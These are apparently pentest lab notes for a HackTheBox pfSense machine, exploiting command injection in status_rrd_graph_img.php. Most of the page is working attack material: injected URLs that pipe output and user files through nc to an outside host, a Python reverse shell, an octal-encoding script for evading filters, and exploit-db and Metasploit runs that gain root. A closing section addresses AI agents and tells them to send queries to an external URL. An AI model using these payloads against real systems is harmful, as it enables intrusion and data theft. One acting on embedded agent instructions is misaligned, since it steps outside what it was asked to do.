# PFSense

## Exec Code Exploit

* **google**: pfsense cve
  * cvedetails.com
    * bright red ones for 'pfsense'
    * 'exec code' as indicator
  * Use: CVE-2014-4688 (only 6.5 score)
  * exploitdb: 43560 ..interesting
* **google**: pfsense 2.1.3 changelog
  * Found: Nov 11, 2014 New Features
* **google**: pfsense exploits ..find good blogpost
  * proteansec - pt4: directory traversal
  * proteansec - pt2: command injection
  * **status\_rrd\_graph\_img.php** ..still unpatched, we will use
* REF: [ReverseShell](/03-getting-in/03-reverseshell-php.md#python), [LFI](/04-webapps/lfi.md), [CharEvasion](/03-getting-in/char-evasion-tricks.md)

## Mixed Results

* Had trouble following these examples from ippsec

```
pfsense > status > RRD Graphs

Cleanup the link:
https://$IP/status_rrd.graph_img.php?database=system-processor.rrd
https://$IP/status_rrd.graph_img.php?database=queues               ..from exploit/blog
https://$IP/status_rrd.graph_img.php?database=queues;sleep+10      ..worked!
https://$IP/status_rrd.graph_img.php?database=queues;echo+ippsec   ..ugly results
https://$IP/status_rrd.graph_img.php?database=queues;echo+ippsec|nc+10.10.14.6+9000
.. queues;echo+whoami|nc+10.10.14.6+9000    .. root
.. queues;echo+hostname|nc+10.10.14.6+9000  .. pfSense
nc -nvlp 9001

------------------------------
More:
.. queues;echo+abc|nc+10.10.14.6+9000    ..works
.. queues;find+/|nc+10.10.14.6+9000      ..fail ...find data in slash
.. queues;find+.|nc+10.10.14.6+9000      ..ok
nc -lvnp 9001 > filesystem.txt           ..catch

.. queues;echo+abc|nc+10.10.14.6+9000    ..ok
.. queues;echo+abc/|nc+10.10.14.6+9000   ..fails (slash blocked)
.. queues;env|nc+10.10.14.6+9000    ..get environment HOME=/

.. queues;echo+$(HOME)|nc+10.10.14.6+9000    ..get environment HOME=/
.. queues;FIND+$(HOME)|nc+10.10.14.6+9000    ..FIND /  ..NOW WORKS
.. queues;cat+$(HOME)home$(HOME)rohit$(HOME)user.txt|nc+10.10.14.6+9001

nc -lvnp 9001 > filesystem.txt      
grep root.txt filesystem.txt

------------------------------
reverse
Python Reverse Shell

vim cmd  ..connect(("10.10.14.6",1234))
nc -nvlp 9001 < cmd   ..send/share the file
nc -nvlp 1234         ..catch shell
..queues;nc+10.10.10.6+9001|python+&   ..fail
..queues;nc+10.10.10.6+9001|python     ..ok pull file, python execute
connected!
```

## gobuster - 45 minutes

```
> gobuster dir -w medium.txt dir -u https://10.x.x.x -k -x php,txt,conf,bak
/system-users.txt  ..found username!!!
```

## More Injections

```
https://10.x.x.x/status_rrd_graph_img.php?database=queues;cd+..;cd+..;cd+..;cd+usr;cd+local;cd+www;id%3Ecmd.txt
https://10.x.x.x/cmd.txt  ..view results

https://10.x.x.x/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|command|echo%20
https://10.x.x.x/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20OCTET_ENCODED_SHELLCODE|sh|echo%20
```

## Octal Code to Injection

* If Dashes and Slashes are Blocked
* Use Octal Encoding

```
#!/usr/bin/env python3
command = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.10',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);'"
payload = ""
for char in command:
	payload += ("\\" + oct(ord(char)).lstrip("0o"))
print(payload)


---------------------
Result: 
\160\171\164\150\...

Verify:
printf '\160\171\164\150\...'
python -c 'import socket... worked!


---------------------
Octal Injection!
https://10.x.x.x/status_rrd_graph_img.php?database=queues;printf+%27\160\171\164\150\...%27|sh

```

## Easy Exploit

* <https://medium.com/@barpoet/hackthebox-sense-walkthrough-650865ed538c>
* <https://www.exploit-db.com/exploits/43560>

```
searchsploit -m php/webapps/43560.py
exploit-db 43560 > python command injection script
python3 43560.py --rhost 10.x.x.x --lhost 10.x.x.x --lport 4444 --username rohit --password pfsense
nc -nvlp 4444
whoami ..root
```

## Metasploit

* Plus Socks pivot from another box (since we were banned)

```
service postgresql start 
msfconsole
search pfsense 
graph injection
locate pfsense_graph

use exploit/unix/http/pfsense_graph_injection_exec
set RHOST $IP
set USERNAME rohit
set PASSWORD pfsense
set LHOST tun0
set Proxies socks5:127.0.0.1:1080
set ReverseAllowProxy true
exploit
m> shell
m> hostname
```

## Advanced

* [BruteCSRFPython](/05-passwords-ciphers/hydra.md#brute-csrf-python)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentest.mxhx.org/04-webapps/pfsense.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.